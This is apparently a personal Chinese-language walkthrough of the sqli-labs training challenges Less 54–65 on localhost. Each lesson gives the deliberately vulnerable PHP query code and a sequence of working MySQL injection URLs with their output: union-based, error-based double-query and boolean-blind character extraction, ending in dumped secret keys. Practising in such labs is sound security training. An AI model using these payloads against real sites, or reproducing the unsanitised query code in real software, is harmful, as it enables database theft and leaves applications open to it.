SQLI-LAB 的 实战记录(Less 54 - Less 65)

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录，仅供参考。
因为本人学过一些sql注入的内容，所以大部分内容是没有讲解的，如有不清楚的地方，请自行使用搜索引擎查询，相信会得到所需的内容。

Less - 54 Challenge-1

（第54节：挑战 - 1）

Test:

     http://localhost/sqli-lab/Less-54/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 10 attempts
注：数据库名：challenges 最多尝试次数：10

     http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+

注：正常，id周围是单引号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){    echo 'Your Login name:'. $row['username'];    echo 'Your Password:' .$row['password'];}else{     //print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+          //2x51x9lc2b     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+          //id,sessid,secret_QD6G,tryy     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+          //t5OPJLdkJ60DsyF7T1ZL3rfD          //140491cdf5b17300fc51147a33ae86bf注：正则匹配直接暴表名，列名：     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;

---

Less - 55 Challenge-2

（第55节：挑战 - 2）

Test:

     http://localhost/sqli-lab/Less-55/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注：数据库名：challenges 最多尝试次数：14

     http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+     http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+     http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+     http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+

注：正常，id周围是一层括号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){       echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];}else{     //print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+          // tyqb9xz99r     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+          // id,sessid,secret_0LLE,tryy     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+          // HvXC6g9NxUeGwZtpfdEYCtUO          // 486412045b0a355f953e5aa5c8446bcb

---

Less - 56 Challenge-3

（第56节：挑战 - 3）

Test:

     http://localhost/sqli-lab/Less-56/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注：数据库名：challenges 最多尝试次数：14

     http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+     http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+     http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+

注：正常，id周围是双引号和一层括号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];}else{     //print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+          // l1meh6v8xf     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+          // id,sessid,secret_ZIEU,tryy     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+          //3zjx2Ef32x2clWJlRlS4n2wc          // 2de68a7c5e3db6a836ab8f5f109416b8

---

Less - 57 Challenge-4

（第57节：挑战 - 4）

Test:

     http://localhost/sqli-lab/Less-57/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注：数据库名：challenges 最多尝试次数：14

     http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+     http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+     http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+

注：正常，id周围是双引号

Sourse Code：

$id= '"'.$id.'"';$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){        echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];}else{     //print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+          // la5spfxomc     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+          // id,sessid,secret_D2E9,tryy     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+          // AkXpuSMRL2Mjnxbu6ChgdDkI          // 2c26f9a59b0ba61233e6fc0af8e47f14

---

Less - 58 Challenge-5

（第58节：挑战 - 5）

Test:

     http://localhost/sqli-lab/Less-58/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注：数据库名：challenges 最多尝试次数：5

     http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+

注：正常

     http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘) union select 1,2,3 – ’ LIMIT 0,1’ at line 1
注：id周围是单引号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     print_r(mysql_error());  }

Solution：

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          //qrso3pw6sh::challenges::1     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          //id,sessid,secret_MV87,tryy::1     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          // 3XJM8hjFz6KNK5aoNUSApgRW::1

---

Less - 59 Challenge-6

（第59节：挑战 - 6）

Test:

     http://localhost/sqli-lab/Less-59/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注：数据库名：challenges 最多尝试次数：5

     http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” union select 1,2,3 – LIMIT 0,1’ at line 1
注：id周围没有符号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          // b3ndcj1o8v::challenges::1     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          //id,sessid,secret_ZWS2,tryy::1     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          // zhEVMVgMavK0k92OSv8zmTTm::1

---

Less - 60 Challenge-7

（第60节：挑战 - 7）

Test:

     http://localhost/sqli-lab/Less-60/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注：数据库名：challenges 最多尝试次数：5

     http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – “) LIMIT 0,1’ at line 1
注：id周围是双引号和一层括号

Sourse Code：

$id = '("'.$id.'")';$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){       $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     print_r(mysql_error());  }

Solution：

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          //p9gd2w7p0n::challenges::1     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          //id,sessid,secret_THZK,tryy::1     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          // OSpAsCGlNQ8qbUtTnEXHd0WL::1

---

Less - 61 Challenge-8

（第61节：挑战 - 8）

Test:

     http://localhost/sqli-lab/Less-61/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注：数据库名：challenges 最多尝试次数：5

     http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – ‘)) LIMIT 0,1’ at line 1
注：id周围是单引号和两层括号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          //t44dfrest6::challenges::1     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          //id,sessid,secret_BN4M,tryy::1     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+          // dqlfs35mo8ZZlYKFZIvXboSe::1

---

Less - 62 Challenge-9

（第62节：挑战 - 9）

Test:

     http://localhost/sqli-lab/Less-62/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注：数据库名：challenges 最多尝试次数：130

     http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+

注：正常，id周围是单引号和一层括号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     //print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+          //表名 第一个字符：w          // wlo99z7cua     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+          //10110 = 22  ，列名中倒数第四个字符：V          // secret_VUBV     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+          // key 的 第一个字符：1          // 1kqTprKdfAt6VGFEoEcpYgjG

注：随机值
表名 10位 由 小写字母和数字 组成
secret_XXXX 后四位由 大写字母和数字 组成
key 24位 由 大小写字母和数字 组成

---

Less - 63 Challenge-10

（第63节：挑战 - 10）

Test:

     http://localhost/sqli-labess-63/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注：数据库名：challenges 最多尝试次数：130

     http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+

注：正常，id周围是单引号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     //print_r(mysql_error());  }

Solution：

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from  gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+          // key 的 第一个字符：G          //  Gd65kBLDXbCY7wrwRq5jzM4l

---

Less - 64 Challenge-11

（第64节：挑战 - 11）

Test:

     http://localhost/sqli-lab/Less-64/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注：数据库名：challenges 最多尝试次数：130

     http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+     http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+     http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+     http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+     http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+

注：正常，id周围是两层括号

Sourse Code：

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     //print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 64 --+     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 97 --+     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+          // key 的 第一个字符：g          //  gpu9QBywZI8jL2M7Uj6DDELa

---

Less - 65 Challenge-12

（第65节：挑战 - 12）

Test:

     http://localhost/sqli-lab/Less-65/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注：数据库名：challenges 最多尝试次数：130

     http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+

注：不显示正确信息

     http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+     http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+     http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+

注：正常，id周围是双引号和一层括号

Sourse Code：

$id = '"'.$id.'"';$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");     $pass = array_reverse($unames);     echo 'Your Login name : '. $unames[$row['id']];     echo 'Your Password : ' .$pass[$row['id']];}else{     //print_r(mysql_error());}

Solution：

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+          // key 的 第一个字符：W          // Wa0mYczFC0wFXygjAFaCA1Tb